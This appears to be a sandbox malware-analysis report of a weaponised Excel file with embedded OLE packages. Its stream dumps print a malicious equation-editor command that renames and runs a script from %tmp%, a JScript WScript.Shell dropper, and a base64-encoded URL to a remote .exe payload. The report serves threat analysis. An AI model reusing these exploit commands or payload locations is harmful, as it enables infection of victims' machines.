Data Raw: | 93 4b 2a a6 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 06 00 00 00 00 00 01 00 02 00 06 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 |
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 357 |
Entropy: | 2.80835793457 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h w n d . . . . . . . . . . . . . . . . l p O p e r a t i o n . . . . . . . . . . . . . . . . l p F i l e . . . . . . . . . . . . . . . . l p P a r a m e t e r s . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 280 |
Entropy: | 2.08670864085 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 02 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 494 |
Entropy: | 2.08257572338 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . A . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . 0 . . p . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 78 00 41 09 00 00 00 00 00 00 00 00 00 00 00 00 00 70 18 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 637 |
Entropy: | 6.51431475451 |
Base64 Encoded: | True |
Data ASCII: | . y . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 3 Z . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 79 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 33 5a 02 62 07 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-02-01T18:28:07Z |
Last Saved Time: | 2020-02-01T18:32:27Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 12.0000 |
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 76 |
Entropy: | 3.09344952647 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
---|---|
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 16232 |
Entropy: | 4.721058556 |
Base64 Encoded: | True |
Data ASCII: | d ? . . . . q . C : \\ U s e r s \\ A d m i n i s t r a t o r \\ D o w n l o a d s \\ E x c e l E x p l o i t 1 . 9 4 \\ t e m p \\ q . . . . . ) . . . C : \\ U s e r s \\ A D M I N I ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 \\ q . . > . . . . < p a c k a g e > . . < j o b i d = " 0 0 0 1 " > . . < s c r i p t l a n g u a g e = " J S c r i p t " > . . v a r o b j s h e l l = n e w A c t i v e X O b j e c t ( " W s c r i p t . S h e l l " ) ; |
Data Raw: | 64 3f 00 00 02 00 71 00 43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 6f 77 6e 6c 6f 61 64 73 5c 45 78 63 65 6c 20 45 78 70 6c 6f 69 74 20 31 2e 39 34 5c 74 65 6d 70 5c 71 00 00 00 03 00 29 00 00 00 43 3a 5c 55 73 65 72 73 5c 41 44 4d 49 4e 49 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 32 5c 71 00 1e 3e 00 00 0d 0a 3c 70 61 63 6b 61 |
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-02-01T18:28:07Z |
Last Saved Time: | 2020-02-01T18:32:27Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 12.0000 |
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 76 |
Entropy: | 3.09344952647 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
---|---|
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 29338 |
Entropy: | 4.25418403894 |
Base64 Encoded: | True |
Data ASCII: | . r . . . . x x . C : \\ U s e r s \\ A d m i n i s t r a t o r \\ D o w n l o a d s \\ E x c e l E x p l o i t 1 . 9 4 \\ t e m p \\ x x . . . . . * . . . C : \\ U s e r s \\ A D M I N I ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 \\ x x . G q . . . . f s d f d s f s = " a H R 0 c H M 6 L y 9 t d W x 0 a X d h c m V 0 Z W N u b 2 x v Z 2 l h L m N v b S 5 i c i 9 q c y 9 Q b 2 R h b G l y a T Q u Z X h l " ' 1 0 0 . . l i h g t 7 y 8 u o j b j v h g t d = " U G 9 k Y W x p c m k 0 L m V 4 Z Q = = " |
Data Raw: | 96 72 00 00 02 00 78 78 00 43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 6f 77 6e 6c 6f 61 64 73 5c 45 78 63 65 6c 20 45 78 70 6c 6f 69 74 20 31 2e 39 34 5c 74 65 6d 70 5c 78 78 00 00 00 03 00 2a 00 00 00 43 3a 5c 55 73 65 72 73 5c 41 44 4d 49 4e 49 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 32 5c 78 78 00 47 71 00 00 0d 0a 66 73 64 |
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-02-01T18:28:07Z |
Last Saved Time: | 2020-02-01T18:32:27Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 12.0000 |
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 102 |
Entropy: | 1.0435456889 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
---|---|
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 62 |
Entropy: | 2.77883844661 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 31 00 |
General | |
---|---|
Stream Path: | Equation Native |
File Type: | data |
Stream Size: | 3440 |
Entropy: | 2.54911524462 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . y V . . . T . . . . . . . . . . . . . . . c M D / c R E N % t m p % \\ q . v & . W S C r I p T . % t m p % \\ v ? . . w s f . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 1c 00 00 00 01 00 b7 c1 c8 00 00 00 00 00 00 00 c8 79 56 00 b4 06 54 00 00 00 00 00 01 01 01 03 0a 0f 01 08 1d 00 63 4d 44 20 2f 63 20 52 45 4e 20 25 74 6d 70 25 5c 71 09 76 26 09 57 53 43 72 49 70 54 09 25 74 6d 70 25 5c 76 3f 2e 2e 77 73 66 20 12 0c 43 00 bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
System Behavior |
---|
Start time: | 07:30:56 |
Start date: | 29/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f440000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
LPC Port Activities
Disassembly |
---|